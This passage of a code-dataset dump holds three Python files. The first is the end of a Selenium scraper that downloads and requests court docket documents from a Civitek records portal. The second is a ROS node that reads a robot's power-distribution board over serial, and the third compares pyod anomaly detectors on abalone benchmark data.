to_date):\n\n\t\ttry:\n\t\t\t# Access Public\n\t\t\tself.publicPageAccess()\n\t\t\t# Access Disclaimer\n\t\t\tself.disclaimerPageAccess()\n\t\t\t# Access Search\n\t\t\tself.searchPageAccess(search_term, from_date, to_date)\n\t\t\t# Process Search\n\t\t\tself.handle_cases()\n\n\t\t\tself.logger.info('INFO: Finished search.')\n\n\t\tfinally:\n\t\t\tself._driver.quit()\n\n\t\"\"\"\n\t\tProcesses Access Records Page for public access\n\t\"\"\"\n\tdef publicPageAccess(self):\n\t\t# Get PUBLIC button and click\n\t\tpublicBtn = self.wait_get_element_located(By.XPATH, PUBLIC_PAGE_PUBLIC_BUTTON_XPATH, 30)\n\t\tself.scroll_click(publicBtn)\n\n\t\"\"\"\n\t\tProcesses Disclaimer Page\n\t\"\"\"\n\tdef disclaimerPageAccess(self):\n\t\t# Check that Disclaimer page has loaded\n\t\tself.wait_get_element_located(By.XPATH, '//h3', 30)\n\t\t# Get AGREE button and click\n\t\tdisclaimerBtn = self.wait_get_element_located(By.ID, DISCLAIMER_PAGE_AGREE_BUTTON_ID, 10)\n\t\tself.scroll_click(disclaimerBtn)\n\n\t\"\"\"\n\t\tProcesses search page\n\t\"\"\"\n\tdef searchPageAccess(self, search_term, start_date, end_date):\n\t\ttime.sleep(25)\n\t\t# Handle CAPTCHA by allowing user input\n\t\tWebDriverWait(self._driver, 10).until(EC.invisibility_of_element_located((By.XPATH, SEARCH_PAGE_CAPTCHA_XPATH)))\n\n\t\t# Input business search term\n\t\tself.wait_get_element_located(By.ID, SEARCH_PAGE_BUSINESS_INPUT_ID, 10).send_keys(search_term)\n\n\t\t# Input from date mm/dd/yyyy\n\t\tself.wait_get_element_located(By.ID, SEARCH_PAGE_FROM_DATE_INPUT_ID, 10).send_keys(start_date)\n\n\t\t# Input to date mm/dd/yyyy\n\t\tself.wait_get_element_located(By.ID, SEARCH_PAGE_TO_DATE_INPUT_ID, 10).send_keys(end_date)\n\n\t\t# Check Display Cases Input\n\t\tdisplayCasesRadioBtn = self.wait_get_element_located(By.XPATH, searCH_PAGE_DISPLAY_CASES_X_PATH, 10)\n\t\tself.scroll_click(displayCasesRadioBtn)\n\n\t\t# Search\n\t\tsearchBtn = self.wait_get_element_located(By.XPATH, SEARCH_PAGE_SEARCH_BUTTON_XPATH, 10)\n\t\tself.scroll_click(searchBtn)\n\n\t\tself.logger.info('Searching for {} from {} to {}.'.format(search_term, start_date, end_date))\n\n\t\"\"\"\n\t\tFind all cases in search results\n\t\"\"\"\n\tdef handle_cases(self):\n\t\ttime.sleep(5)\n\t\t# Check results page has loaded\n\t\tself.wait_element_text_present(By.TAG_NAME, 'h2', 'Search Results')\n\n\t\t# Find number of cases and loop through each case\n\t\tnum_cases = len(self._driver.find_elements_by_xpath(RESULTS_PAGE_TABLE_ROWS_XPATH))\n\t\tself.process_cases_page(1, num_cases, RESULTS_PAGE_TABLE_ROWS_XPATH, RESULTS_PAGE_TABLE_ROW_CASE_LINK_XPATH, 1, False)\n\n\t\"\"\"\n\t\tProcess Case Number\n\t\"\"\"\n\tdef process_case(self, case_number):\n\n\t\t# Toggle number of dockets to 'ALL'\n\t\tself.toggle_docket_dropdown()\n\n\t\t# Get number of documents\n\t\tnum_dockets = len(self._driver.find_elements_by_xpath(CASE_PAGE_DOCKET_TABLE_ROWS_XPATH))\n\n\t\tself.logger.info('Case {} has {} documents.'.format(case_number, num_dockets))\n\n\t\t# Process case documents\n\t\tself.get_case_documents(case_number, 1, num_dockets, CASE_PAGE_DOCKET_TABLE_ROWS_XPATH)\n\n\t\"\"\"\n\t\tToggle dropdown to display 'ALL' dockets\n\t\"\"\"\n\tdef toggle_docket_dropdown(self):\n\t\t# Toggle number of dockets to 'ALL'\n\t\ttry:\n\t\t\tif self.wait_get_element_located(By.ID, CASE_PAGE_THEAD_PAGINATOR):\n\t\t\t\tselectDropDown = WebDriverWait(self._driver, 5).until(lambda x=self._driver:Select(x.find_element_by_id(CASE_PAGE_NUM_DOCKETS_SELECT_ID)))\n\t\t\t\tselectDropDown.select_by_index(4)\n\t\t\t\t# Wait 
until next button becomes disabled\n\t\t\t\tself.wait_get_element_located(By.XPATH, CASE_PAGE_THEAD_PAGINATOR_NEXT_DISABLED_XPATH, 20)\n\t\texcept TimeoutException:\n\t\t\t# Paginator doesn't exist, because not enough dockets\n\t\t\tself.logger.info('Docket table paginator doesn\\'t exist, continuing...')\n\t\t\tpass\n\t\texcept NoSuchElementException:\n\t\t\tself._driver.back()\n\t\t\traise TimeoutException('Unable to locate docket dropdown.')\n\n\t\"\"\"\n\t\tGet Document for case and download\n\n\t\t:param docket_row - Document Row Element\n\t\t:param case_num - Case Number\n\t\t:param doc_iterator - Document Counter\n\t\t:param num_dockets - Total number of documents for the case\n\t\"\"\"\n\tdef process_document(self, docket_row, case_num, doc_iterator, num_dockets):\n\t\t# Get Docket Description\n\t\tdocket_descr = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_DESCR_XPATH_MODIFIER).text\n\t\tif self.matches_document_description(docket_descr):\n\t\t\t# Get Docket\n\t\t\tdocket = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_IMAGE_XPATH_MODIFIER)\n\t\t\t# Get Docket Number\n\t\t\tdocket_num = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_NUM_XPATH_MODIFIER).text\n\t\t\t# Download\n\t\t\tself.scroll_click(docket)\n\t\t\t# Rename File\n\t\t\tself.rename_file(case_num, docket_descr, docket_num, 240)\n\t\t\tself.logger.info('{}/{} downloaded: document \\\"{}\\\" for case # {}, docket # {}.'.format(doc_iterator+1, num_dockets, docket_descr, case_num, docket_num))\n\t\telse:\n\t\t\traise DocumentException('Document description {} did not match {}.'.format(docket_descr, self._match_document_description))\n\n\n\"\"\"\n\tClass to find files that need to be requested and submitting requests\n\"\"\"\nclass CivitekFileRequester(CivitekProcessor):\n\t\n\t_request_made = False\n\n\t\"\"\"\n\t\tProcess Case Number\n\t\"\"\"\n\tdef process_case(self, case_number):\n\t\tsuper().process_case(case_number)\n\t\t# Sleep 2 minutes if case requests have been made\n\t\tif self._request_made:\n\t\t\ttime.sleep(120)\n\t\t\tself._request_made = False\n\n\t\"\"\"\n\t\tRequest locked document\n\n\t\t:param docket_row - Document Row Element\n\t\t:param case_num - Case Number\n\t\t:param doc_iterator - Document Counter\n\t\t:param num_dockets - Total number of documents for the case\n\t\"\"\"\n\tdef process_document(self, docket_row, case_num, doc_iterator, num_dockets):\n\t\t# Readjust show all documents\n\t\tif self._request_made:\n\t\t\tself.toggle_docket_dropdown()\n\t\t# Get docket row again due to page refresh after requesting document\n\t\tdocket_row = self.wait_get_element_located(By.XPATH, CASE_PAGE_DOCKET_TABLE_ROW_XPATH.format(doc_iterator))\n\t\t# Get Docket Description\n\t\tdocket_descr = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_DESCR_XPATH_MODIFIER).text\n\t\tif self.matches_document_description(docket_descr):\n\t\t\t# Get Docket Request\n\t\t\tdocket = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_REQ_XPATH_MODIFIER)\n\t\t\t# Get Docket Number\n\t\t\tdocket_num = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_NUM_XPATH_MODIFIER).text\n\t\t\t# Download\n\t\t\tself.scroll_click(docket)\n\t\t\tself.process_request()\n\t\t\tself.logger.info('{}/{} requested: document \\\"{}\\\" for case # {}.'.format(doc_iterator+1, num_dockets, docket_descr, case_num))\n\t\telse:\n\t\t\traise DocumentException('Document description {} did not match {}.'.format(docket_descr, self._match_document_description))\n\n\tdef process_request(self):\n\t\t# 
Checkbox\n\t\tself.wait_get_element_clickable(By.XPATH, '//div[@id=\"vor_checkBox\"]/div[2]/span').click()\n\t\t# Get input name\n\t\tself.wait_get_element_located(By.XPATH, '//table[@id=\"vor_panel\"]/tbody/tr[1]/td[2]/input').send_keys('Rob Quin')\n\t\t# Get input email\n\t\tself.wait_get_element_located(By.XPATH, '//table[@id=\"vor_panel\"]/tbody/tr[2]/td[2]/input').send_keys('help@billmoretech.com')\n\t\t# Click\n\t\tself.scroll_click(self.wait_get_element_clickable(By.XPATH, '//div[@id=\"vorContent\"]/button[1]'))\n\t\ttime.sleep(5)\n\t\tself.scroll_click(self.wait_get_element_clickable(By.XPATH, '//div[@id=\"vorSuccessMsg\"]/button'))\n\t\ttime.sleep(10)\n\t\tself._request_made = True\n\n\t\t\n\"\"\"\n\tCounty metadata scraper, uploading to database\n\"\"\"\nclass CivitekDataGather(CivitekProcessor):\n\n\t\"\"\"\n\t\tConstructor\n\t\"\"\"\n\tdef __init__(self, county_name, website, download_folder, document_description):\n\t\tsuper().__init__(county_name, website, download_folder, document_description)\n\n\t\tself.database = DynamoInterface()\n\n\t\tself.logger.info('Running data gather for {} county.'.format(county_name))\n\n\tdef execute(self, search_term, start_date, end_date):\n\t\tself.search_term = search_term\n\t\tsuper().execute(search_term, start_date, end_date)\n\n\tdef process_case(self, case_num):\n\t\tsuper().process_case(case_num)\n\n\t\tself.logger.info('Writing case {} to database.'.format(case_num))\n\t\t# Insert cases object into database\n\t\tself.database.insert_case_object(self.database.create_case_object(\n\t\t\tself.county_name,\n\t\t\tCompanyInterface.get_company_name(self.search_term),\n\t\t\tcase_num))\n\n\t\"\"\"\n\t\tGet the metadata that explains which Documents are available for download by case\n\n\n\t\t:param docket_row - Document Row Element\n\t\t:param case_num - Case Number\n\t\t:param doc_iterator - Document Counter\n\t\t:param num_dockets - Total number of documents for the case\n\t\"\"\"\n\n\tdef process_document(self, docket_row, case_num, doc_iterator, num_dockets):\n\t\t\n\t\tavailability = DocumentInterface.UNAVAILABLE\n\t\ttry:\n\t\t\t# Check document available\n\t\t\tdocket_row.find_element_by_xpath(CASE_PAGE_DOCKET_IMAGE_XPATH_MODIFIER)\n\t\t\tavailability = DocumentInterface.AVAILABLE\n\t\texcept NoSuchElementException:\n\t\t\tpass\n\t\ttry:\n\t\t\t#Check document \n\t\t\tdocket_row.find_element_by_xpath(CASE_PAGE_DOCKET_RESTRICTED_XPATH_MODIFIER)\n\t\t\tavailability = DocumentInterface.RESTRICTED\n\t\texcept NoSuchElementException:\n\t\t\tpass\n\n\t\t# Get Docket Description\n\t\tdescription = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_DESCR_XPATH_MODIFIER).text\n\n\t\t# Get Docket Number\n\t\tdocket_num = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_NUM_XPATH_MODIFIER).text\n\t\tif not docket_num or docket_num == '':\n\t\t\tdocket_num = doc_iterator\n\t\telse:\n\t\t\tdocket_num = int(docket_num)\n\n\t\tname = FileProcessor.new_file_name(self.county_name, case_num, description, docket_num, '.' + DOCUMENT_FILE_EXTENSION)\n\n\t\t# Upload document data\n\t\tself.database.insert_document_object(self.database.create_document_object(\n\t\t\tname,\n\t\t\tcase_num,\n\t\t\tdocket_num,\n\t\t\tdescription,\n\t\t\tDOCUMENT_FILE_EXTENSION, \n\t\t\tavailability))\n\n","sub_path":"civitek_processor.py","file_name":"civitek_processor.py","file_ext":"py","file_size_in_byte":14185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"89874623","text":"#! 
/usr/bin/env python3\n\nimport sys\nimport traceback\nimport time\nimport re\n\nimport serial # pyserial\nimport serial.tools.list_ports # pyserial\n#from robot.comms.uart import Uart\n#import from mcuSerial import McuSerial # this isn't anything yet, just a copy of uart.py\n\nimport rospy\nfrom std_msgs.msg import String, Float32\nfrom geometry_msgs.msg import Point\nfrom sensor_msgs.msg import JointState\nfrom mcu_control.srv import *\n\nglobal ser # make global so it can be used in other parts of the code\nmcuName = 'PDS'\n\n# 300 ms timeout... could potentially be even less, needs testing\ntimeout = 1 # to wait for a response from the MCU\n\n# todo: test ros+website over network with teensy\n# todo: make a MCU serial class that holds the port initialization stuff and returns a reference?\n# todo: put similar comments and adjustments to code in the publisher and server demo scrips once finalized\n\n# setup serial communications by searching for arm teensy if USB, or simply connecting to UART\ndef init_serial():\n baudrate = 9600\n # in a perfect world, you can choose the baudrate\n rospy.loginfo('Using %d baud by default', baudrate)\n # in a perfect world, usb vs uart will be set by ROS params\n usb = False\n uart = True\n myargv = rospy.myargv(argv=sys.argv)\n if len(myargv) == 1:\n rospy.loginfo('Using UART by default')\n if len(myargv) > 1:\n if myargv[1] == 'uart':\n usb = False\n uart = True\n rospy.loginfo('Using UART and 9600 baud by default')\n elif myargv[1] == 'usb':\n usb = True\n uart = False\n rospy.loginfo('Using USB and 9600 baud by default')\n else:\n rospy.logerr('Incorrect argument: expecting \"usb\" or \"uart\"')\n sys.exit(0)\n\n global ser #make global so it can be used in other parts of the code\n\n ports = list(serial.tools.list_ports.comports())\n\n startConnecting = time.time()\n if usb:\n baudrate = 19200\n if len(ports) > 0:\n rospy.loginfo(\"%d USB device(s) detected\", len(ports))\n for portObj in ports:\n port = portObj.name\n rospy.loginfo('Attempting to connect to /dev/' + port)\n ser = serial.Serial('/dev/' + port, baudrate)\n\n rospy.loginfo(\"clearing buffer...\")\n while ser.in_waiting:\n ser.readline()\n\n rospy.loginfo(\"identifying MCU by sending 'who' every %d ms\", timeout * 1000)\n for i in range(5):\n rospy.loginfo('attempt #%d...', i + 1)\n startListening = time.time()\n ser.write(str.encode('who\\n'))\n while time.time() - startListening < timeout:\n if ser.in_waiting: # if there is data in the serial buffer\n response = ser.readline().decode()\n rospy.loginfo('response: ' + response)\n if mcuName in response:\n rospy.loginfo(mcuName + \" MCU identified!\")\n rospy.loginfo(\n 'timeout: %f ms', (time.time() - startListening) * 1000\n )\n rospy.loginfo(\n 'took %f ms to find the ' + mcuName + ' MCU',\n (time.time() - startConnecting) * 1000\n )\n return\n else:\n rospy.logerr(\"No USB devices recognized, exiting\")\n sys.exit(0)\n\n elif uart:\n port = 'ttySAC0'\n rospy.loginfo('Attempting to connect to /dev/' + port)\n try:\n ser = serial.Serial('/dev/' + port, baudrate)\n except:\n rospy.logerr('No UART device recognized, terminating PDS node')\n sys.exit(0)\n\n rospy.loginfo(\"clearing buffer...\")\n while ser.in_waiting:\n ser.readline()\n\n rospy.loginfo(\"identifying MCU by sending 'who' every %d ms\", timeout * 1000)\n for i in range(1, 6):\n rospy.loginfo('attempt #%d...', i)\n startListening = time.time()\n ser.write(str.encode('who\\n'))\n while time.time() - startListening < timeout:\n if ser.in_waiting:\n dat = ''\n data = None\n 
try:\n                    #dat = ser.readline().decode()\n                    data = ser.readline().decode()\n                    #data = stripFeedback(dat)\n                except Exception as e:\n                    print(\"type error: \" + str(e))\n                    rospy.logwarn('trouble reading from serial port')\n                if data is not None:\n                    if mcuName in data:\n                        rospy.loginfo(mcuName + \" MCU identified!\")\n                        rospy.loginfo('timeout: %f ms', (time.time() - startListening) * 1000)\n                        rospy.loginfo(\n                            'took %f ms to find the ' + mcuName + ' MCU',\n                            (time.time() - startConnecting) * 1000\n                        )\n                        return\n                    else:\n                        rospy.loginfo('got raw message: ' + data)\n\n        rospy.logerr('Incorrect MCU connected, terminating listener')\n        sys.exit(0)\n\nrequests = {\n    'PDS T 1' : ['ON'],\n    'PDS T 0' : ['OFF'],\n    #'who' : ['pds'], #@TODO: MCU code can't handle this request, fix it\n    'PDS M 1 1' : ['toggling'],\n    'PDS M 1 0' : ['toggling'],\n    'PDS M 2 1' : ['toggling'],\n    'PDS M 2 0' : ['toggling'],\n    'PDS M 3 1' : ['toggling'],\n    'PDS M 3 0' : ['toggling'],\n    'PDS M 4 1' : ['toggling'],\n    'PDS M 4 0' : ['toggling'],\n    'PDS M 5 1' : ['toggling'],\n    'PDS M 5 0' : ['toggling'],\n    'PDS M 6 1' : ['toggling'],\n    'PDS M 6 0' : ['toggling']\n}\ndef handle_client(req):\n    global ser # specify that it's global so it can be used properly\n    global reqFeedback\n    global reqInWaiting\n    pdsResponse = ArmRequestResponse()\n    timeout = 0.3 # 300ms timeout\n    reqInWaiting = True\n    sinceRequest = time.time()\n    rospy.loginfo('received '+req.msg+' request from GUI, sending to PDS MCU')\n    ser.write(str.encode(req.msg+'\\n')) # ping the teensy\n    while not pdsResponse.success and (time.time()-sinceRequest < timeout):\n        if reqFeedback != '':\n            for request in requests:\n                for response in requests[request]:\n                    if request == req.msg and response in reqFeedback:\n                        pdsResponse.response = reqFeedback\n                        pdsResponse.success = True #a valid request and a valid response from the MCU\n                        break\n                if pdsResponse.success:\n                    break\n            else:\n                pdsResponse.response = reqFeedback\n        rospy.Rate(100).sleep()\n    rospy.loginfo('took '+str(time.time()-sinceRequest)+' seconds, sending this back to GUI: ')\n    rospy.loginfo(pdsResponse)\n    reqFeedback=''\n    reqInWaiting=False\n    return pdsResponse\n\ndef subscriber_callback(message):\n    global ser # specify that it's global so it can be used properly\n    rospy.loginfo('received: ' + message.data + ' command from GUI, sending to PDS')\n    command = str.encode(message.data + '\\n')\n    ser.write(command) # send command to PDS\n    return\n\ndef publish_pds_data(message):\n    # parse the data received from PDS\n    # converts message from string to float\n    dataPDS = message.split(',') ###returns an array of ALL data from the PDS\n    # create the message to be published\n    voltage = Float32()\n    current = JointState()\n    temp = Point()\n    fanSpeeds = Point()\n    try:\n        for i in range(12):\n            if i < 1:\n                voltage.data = float(dataPDS[i])\n                rospy.loginfo('voltage=' + dataPDS[i])\n            elif i < 7:\n                current.effort.append(float(dataPDS[i]))\n            elif i < 10:\n                temp.x = float(dataPDS[7])\n                temp.y = float(dataPDS[8])\n                temp.z = float(dataPDS[9])\n            else:\n                fanSpeeds.x = float(dataPDS[10])\n                fanSpeeds.y = float(dataPDS[11])\n\n        temps = ''\n        for i in [dataPDS[7], dataPDS[8], dataPDS[9]]:\n            temps += i.strip() + ','\n        temps = temps[:-1]\n        rospy.loginfo('temps=' + temps)\n\n        # motor currents\n        currents = ''\n        for i in current.effort:\n            currents += str(i).strip() + ','\n        currents = currents[:-1]\n\n        rospy.loginfo('currents=' + currents)\n        # battery voltage\n        voltagePub.publish(voltage)\n        # 6 motor currents from M0-M5\n        currentPub.publish(current)\n        # temperatures of the battery\n        
tempPub.publish(temp)\n fanSpeedsPub.publish(fanSpeeds)\n nada,firstFlag = dataPDS[12].split(' ')\n flagsMsg = firstFlag+','+dataPDS[13]+','+dataPDS[14].strip('\\r')\n flagsPub.publish(flagsMsg)\n except Exception as e:\n print(\"type error: \" + str(e))\n rospy.logwarn('trouble parsing PDS sensor data')\n return\n return\n\ndef stripFeedback(data):\n startStrips = ['PDS ', 'Command', 'Motor']\n endStrips = ['\\r\\n', '\\n']\n for strip in startStrips:\n if data.startswith(strip) and data.count(strip) == 1:\n try:\n data, right = data.split(endStrips[0])\n except:\n pass\n try:\n data, right = data.split(endStrips[1])\n except:\n pass\n #left, data = data.split(startStrip)\n return data\n return None\n\nif __name__ == '__main__':\n node_name = 'pds_node'\n rospy.init_node(node_name, anonymous=False) # only allow one node of this type\n rospy.loginfo('Initialized \"' + node_name + '\" node for pub/sub/service functionality')\n\n voltage_pub_topic = '/battery_voltage'\n rospy.loginfo('Beginning to publish to \"' + voltage_pub_topic + '\" topic')\n voltagePub = rospy.Publisher(voltage_pub_topic, Float32, queue_size=10)\n\n current_pub_topic = '/wheel_motor_currents'\n rospy.loginfo('Begining to publish to \"' + current_pub_topic + '\" topic')\n currentPub = rospy.Publisher(current_pub_topic, JointState, queue_size=10)\n\n temp_pub_topic = '/battery_temps'\n rospy.loginfo('Begining to publish to \"' + temp_pub_topic + '\" topic')\n tempPub = rospy.Publisher(temp_pub_topic, Point, queue_size=10)\n\n fan_speeds_pub_topic = '/fan_speeds'\n rospy.loginfo('Beginning to publish to \"' + fan_speeds_pub_topic + '\" topic')\n fanSpeedsPub = rospy.Publisher(fan_speeds_pub_topic, Point, queue_size=10)\n\n error_flags_topic = '/pds_flags'\n rospy.loginfo('Beginning to publish to \"' + error_flags_topic + '\" topic')\n flagsPub = rospy.Publisher(error_flags_topic, String, queue_size=10)\n\n feedback_pub_topic = '/pds_feedback'\n rospy.loginfo('Beginning to publish to \"' + feedback_pub_topic + '\" topic')\n feedbackPub = rospy.Publisher(feedback_pub_topic, String, queue_size=10)\n\n subscribe_topic = '/pds_command'\n rospy.loginfo('Beginning to subscribe to \"' + subscribe_topic + '\" topic')\n sub = rospy.Subscriber(subscribe_topic, String, subscriber_callback)\n\n service_name = '/pds_request'\n rospy.loginfo('Waiting for \"'+service_name+'\" service request from client')\n serv = rospy.Service(service_name, ArmRequest, handle_client)\n\n init_serial()\n\n # service requests are implicitly handled but only at the rate the node publishes at\n global ser\n global reqFeedback\n reqFeedback = ''\n global reqInWaiting\n reqInWaiting = False\n try:\n while not rospy.is_shutdown():\n #if I try reading from the serial port inside callbacks, bad things happen\n #instead I send the data elsewhere if required but only read from serial here.\n #not sure if I need the same precautions when writing but so far it seems ok.\n if ser.in_waiting:\n data = ''\n feedback = None\n try:\n data = ser.readline().decode()\n feedback = stripFeedback(data)\n except Exception as e:\n print(\"type error: \" + str(e))\n rospy.logwarn('trouble reading from serial port')\n if feedback is not None:\n if feedback.startswith('PDS '):\n nada,feedback=feedback.split('PDS ')\n publish_pds_data(feedback)\n else:\n if reqInWaiting:\n reqFeedback += feedback+'\\r\\n' #pass data to request handler\n else:\n if 'WARNING' in feedback:\n rospy.logwarn(feedback)\n #rospy.loginfo(feedback)\n feedbackPub.publish(feedback)\n else:\n rospy.loginfo('got 
raw data: ' + data)\n            rospy.Rate(100).sleep()\n    except rospy.ROSInterruptException:\n        pass\n\n    def shutdown_hook():\n        rospy.logwarn('This node (' + node_name + ') is shutting down')\n        ser.close() # good practice to close the serial port\n        # do I need to clear the serial buffer too?\n        time.sleep(1) # give ROS time to deal with the node closing (rosbridge especially)\n\n    rospy.on_shutdown(shutdown_hook)\n","sub_path":"robot/rospackages/src/mcu_control/scripts/PdsNode.py","file_name":"PdsNode.py","file_ext":"py","file_size_in_byte":13618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"7359546","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom diff_plt import diff_hist\nimport os\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\npath = \"./数据挖掘互评作业四数据集/abalone_benchmarks/abalone/benchmarks\"\n\nfile_list = []\n\nfor _ in os.listdir(path):\n    file_list.append(path + '/' + _)\n\n\n\"\"\"\n#This block extracts the columns common to all of the csv files; the result is listed below. It is slow, so it is commented out; uncomment it if needed\n\n#The common columns are: ['ground.truth', 'V2', 'diff.score', 'original.label', 'motherset', 'V1', 'origin', 'V4', 'V3', 'V7', 'V5', 'V6']\n\ndef extra_same_elem(list1, list2): #this function extracts the elements shared by two lists\n    set1 = set(list1)\n    set2 = set(list2)\n    iset = set1.intersection(set2)\n    return list(iset)\n\nlist1 = pd.read_csv(file_list[0], index_col=0).columns\n\nprint(\"Extracting the columns common to all csv files:\")\nfor file in tqdm(file_list[1:]):\n    list2 = pd.read_csv(file, index_col=0).columns\n    list1 = extra_same_elem(list1, list2)\n\nprint(\"The common columns are:\", list1)\n\ncolumns = list1\n\"\"\"\n\ncolumns = ['V2', 'diff.score', 'original.label', 'V1', 'V4', 'V3', 'V7', 'V5', 'V6']\n\nfrom pyod.models.knn import KNN # import the kNN classifier\nfrom pyod.models.lof import LOF\nfrom pyod.models.pca import PCA\nfrom pyod.models.iforest import IForest\n\n\nfrom pyod.utils.data import evaluate_print\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.utils import column_or_1d\nfrom sklearn.utils import check_consistent_length\n\nfrom pyod.utils.utility import precision_n_scores\n\nknn_roc = []\nknn_prn = []\nlof_roc = []\nlof_prn = []\npca_roc = []\npca_prn = []\niforest_roc = []\niforest_prn = []\n\nfor file in file_list:\n    try:\n        print(file)\n        data = pd.read_csv(file, index_col=0)\n        #data = data[data['ground.truth'] == 'nominal']\n        #data = data[columns]\n        data_len = len(data)\n        data.loc[data['ground.truth'] == 'anomaly','ground.truth'] = 1\n        data.loc[data['ground.truth'] == 'nominal','ground.truth'] = 0\n\n\n        x = data[columns]\n        y = data['ground.truth']\n        #print(x)\n        #print(y)\n\n\n        X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=1)\n\n        clf_name = 'KNN'\n        clf = KNN() # initialize the detector clf\n        clf.fit(X_train) # train the detector clf on X_train\n\n        # get the labels and outlier scores on the training data X_train\n        y_train_pred = clf.labels_ # labels on the training data (0: inlier, 1: outlier)\n        y_train_scores = clf.decision_scores_ # outlier scores on the training data (higher means more anomalous)\n        print(\"On train Data:\")\n        evaluate_print(clf_name, y_train, y_train_scores)\n\n        # use the trained clf to score the unseen data\n        y_test_pred = clf.predict(X_test) # predicted labels on the unseen data (0: inlier, 1: outlier)\n        y_test_scores = clf.decision_function(X_test) # outlier scores on the unseen data (higher means more anomalous)\n        print(\"On Test Data:\")\n        evaluate_print(clf_name, y_test, y_test_scores)\n\n        y_true = column_or_1d(y_test)\n        y_pred = column_or_1d(y_test_scores)\n        check_consistent_length(y_true, y_pred)\n\n        roc = np.round(roc_auc_score(y_true, y_pred), decimals=4)\n        prn = np.round(precision_n_scores(y_true, y_pred), 
decimals=4)\n        knn_roc.append(roc)\n        knn_prn.append(prn)\n\n\n        clf_name = 'LOF'\n        clf = LOF() # initialize the detector clf\n        clf.fit(X_train) # train the detector clf on X_train\n\n        # get the labels and outlier scores on the training data X_train\n        y_train_pred = clf.labels_ # labels on the training data (0: inlier, 1: outlier)\n        y_train_scores = clf.decision_scores_ # outlier scores on the training data (higher means more anomalous)\n        print(\"On train Data:\")\n        evaluate_print(clf_name, y_train, y_train_scores)\n\n        # use the trained clf to score the unseen data\n        y_test_pred = clf.predict(X_test) # predicted labels on the unseen data (0: inlier, 1: outlier)\n        y_test_scores = clf.decision_function(X_test) # outlier scores on the unseen data (higher means more anomalous)\n        print(\"On Test Data:\")\n        evaluate_print(clf_name, y_test, y_test_scores)\n\n        y_true = column_or_1d(y_test)\n        y_pred = column_or_1d(y_test_scores)\n        check_consistent_length(y_true, y_pred)\n\n        roc = np.round(roc_auc_score(y_true, y_pred), decimals=4)\n        prn = np.round(precision_n_scores(y_true, y_pred), decimals=4)\n        lof_roc.append(roc)\n        lof_prn.append(prn)\n\n        clf_name = 'PCA'\n        clf = PCA() # initialize the detector clf\n        clf.fit(X_train) # train the detector clf on X_train\n\n        # get the labels and outlier scores on the training data X_train\n        y_train_pred = clf.labels_ # labels on the training data (0: inlier, 1: outlier)\n        y_train_scores = clf.decision_scores_ # outlier scores on the training data (higher means more anomalous)\n        print(\"On train Data:\")\n        evaluate_print(clf_name, y_train, y_train_scores)\n\n        # use the trained clf to score the unseen data\n        y_test_pred = clf.predict(X_test) # predicted labels on the unseen data (0: inlier, 1: outlier)\n        y_test_scores = clf.decision_function(X_test) # outlier scores on the unseen data (higher means more anomalous)\n        print(\"On Test Data:\")\n        evaluate_print(clf_name, y_test, y_test_scores)\n\n        y_true = column_or_1d(y_test)\n        y_pred = column_or_1d(y_test_scores)\n        check_consistent_length(y_true, y_pred)\n\n        roc = np.round(roc_auc_score(y_true, y_pred), decimals=4)\n        prn = np.round(precision_n_scores(y_true, y_pred), decimals=4)\n        pca_roc.append(roc)\n        pca_prn.append(prn)\n\n        clf_name = 'IForest'\n        clf = IForest() # initialize the detector clf\n        clf.fit(X_train) # train the detector clf on X_train\n\n        # get the labels and outlier scores on the training data X_train\n        y_train_pred = clf.labels_ # labels on the training data (0: inlier, 1: outlier)\n        y_train_scores = clf.decision_scores_ # outlier scores on the training data (higher means more anomalous)\n        print(\"On train Data:\")\n        evaluate_print(clf_name, y_train, y_train_scores)\n\n        # use the trained clf to score the unseen data\n        y_test_pred = clf.predict(X_test) # predicted labels on the unseen data (0: inlier, 1: outlier)\n        y_test_scores = clf.decision_function(X_test) # outlier scores on the unseen data (higher means more anomalous)\n        print(\"On Test Data:\")\n        evaluate_print(clf_name, y_test, y_test_scores)\n\n        y_true = column_or_1d(y_test)\n        y_pred = column_or_1d(y_test_scores)\n        check_consistent_length(y_true, y_pred)\n\n        roc = np.round(roc_auc_score(y_true, y_pred), decimals=4)\n        prn = np.round(precision_n_scores(y_true, y_pred), decimals=4)\n        iforest_roc.append(roc)\n        iforest_prn.append(prn)\n    except:\n        print(\"All predictions fell into a single class. Skipping\")\n        continue\n\n\n\n\n\nprint('KNN average ROC:', np.average(knn_roc))\nprint('KNN average PRN:', np.average(knn_prn))\nprint('LOF average ROC:', np.average(lof_roc))\nprint('LOF average PRN:', np.average(lof_prn))\nprint('PCA average ROC:', np.average(pca_roc))\nprint('PCA average PRN:', np.average(pca_prn))\nprint('IForest average ROC:', np.average(iforest_roc))\nprint('IForest average PRN:', np.average(iforest_prn))\n\n\n\n\n\nroc_all = [np.average(knn_roc), np.average(lof_roc), np.average(pca_roc), np.average(iforest_roc)]\nprn_all = [np.average(knn_prn), np.average(lof_prn), np.average(pca_prn), np.average(iforest_prn)]\nnames = ['KNN', 'LOF', 'PCA', 'IForest']\n\nplt.figure(figsize=(10, 10), dpi=80)\n# create another subplot with a 1 x 1 layout\n# plt.subplot(1, 1, 1)\n# total number of bars\nN = 4\n# sequence containing the value for each bar\nvalues = roc_all\n# sequence containing the index of each bar\nindex = np.arange(N)\n# width of the bars\nwidth = 0.45\n# draw the bar chart\n
